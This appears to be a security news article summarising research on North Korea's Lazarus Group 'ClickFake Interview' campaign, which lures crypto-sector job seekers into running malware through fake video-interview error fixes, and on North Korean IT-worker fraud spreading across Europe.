North Korea’s Lazarus Group is once again making headlines, this time using a deceptive social engineering tactic called ClickFix to infect job seekers—particularly in the cryptocurrency and centralized finance sectors—with a stealthy cross-platform backdoor named GolangGhost.
🎯 A Sophisticated Social Engineering Attack: "ClickFake Interview"
Cybersecurity researchers at French firm Sekoia have named this new wave of attacks ClickFake Interview, an apparent continuation of the earlier campaign dubbed Contagious Interview (also known as DeceptiveDevelopment, DEV#POPPER, or Famous Chollima), first observed in December 2022.
The Lazarus Group, backed by the Reconnaissance General Bureau (RGB) of North Korea, is leveraging fake job listings on legitimate platforms like LinkedIn and X (formerly Twitter) to lure victims into downloading malware-disguised video interview tools. These tools infect Windows and macOS machines with GolangGhost.
💡 What is the ClickFix Technique?
ClickFix, a rising social engineering method first spotlighted in late 2024, tricks users into performing tech "fixes" during a fake job interview process. Victims are directed to Willo, a fake video assessment platform, and are asked to enable their camera. Once an error prompt appears, they’re instructed to download a "driver" to fix the issue—this is the trap.
Windows Users:
-
Told to open Command Prompt and run a
curlcommand. -
The command downloads and executes a VBS script, launching GolangGhost via batch execution.
macOS Users:
-
Asked to run a shell script in Terminal, leading to a stealer module called FROSTYFERRET (aka ChromeUpdateAlert) and the backdoor.
🛑 What GolangGhost and FROSTYFERRET Do
-
FROSTYFERRET displays a fake Chrome window, requesting camera/microphone access and prompting for the system password. Regardless of the password’s validity, it is exfiltrated to a Dropbox location—possibly to unlock iCloud Keychain secrets.
-
GolangGhost offers attackers remote control capabilities, including:
-
File upload/download
-
System reconnaissance
-
Web browser data theft
-
🕵️♂️ Who Are the Targets?
Sekoia observed that unlike prior DPRK job scam campaigns (which targeted software developers), this one focuses on non-technical roles, including:
-
Business Development Managers
-
Product Developers
-
Asset Management Roles
-
DeFi Specialists
This marks a strategic shift, highlighting Lazarus’ evolving tactics.
🌍 North Korean IT Worker Fraud Expands Across Europe
In parallel, Google’s Threat Intelligence Group (GTIG) has revealed a sharp uptick in North Korean IT worker operations across Germany, Portugal, and the UK.
North Korean nationals are:
-
Faking identities (posing as Italians, Japanese, Vietnamese, etc.)
-
Using GitHub, Upwork, Freelancer, and Telegram to land gigs
-
Involved in CMS, bot development, blockchain, and web development
-
Getting paid through crypto, Payoneer, and TransferWise
What’s worse? They’re now infiltrating companies with BYOD (Bring Your Own Device) policies, which typically lack enterprise-grade security protections.
💣 The Insider Threat Evolves: Extortion on the Rise
Since October 2024, cases have surfaced of North Korean IT workers demanding ransom from their employers, threatening to leak sensitive data or sell it to competitors.
“Europe needs to wake up fast,” warns GTIG’s Jamie Collier. “North Korea’s pivot to Europe is a tactical response to U.S. crackdown, and they're adapting with alarming speed.”
🔐 Final Thoughts: Lazarus Isn’t Slowing Down
From SWIFT banking hacks and ransomware to crypto theft and now sophisticated social engineering, Lazarus continues to innovate its cybercrime playbook—all in an effort to fund the regime under international sanctions.